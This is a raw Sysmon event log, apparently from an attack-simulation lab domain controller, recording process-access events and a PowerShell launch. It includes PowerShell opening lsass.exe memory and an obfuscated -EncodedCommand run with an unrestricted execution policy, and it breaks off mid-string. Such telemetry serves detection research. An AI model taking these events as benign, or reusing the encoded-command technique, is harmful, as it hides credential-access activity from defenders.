13:54:15.420{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.420{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.373{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.373{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.326{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xm4tklhx.fxc.ps12020-12-08 13:54:15.326 10341000x80000000000000003907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.310{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.295{10ACEC4A-8587-5FCF-C300-000000009101}50284612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625346c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239cc7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239297(wow64) 154100x80000000000000003894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.297{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBB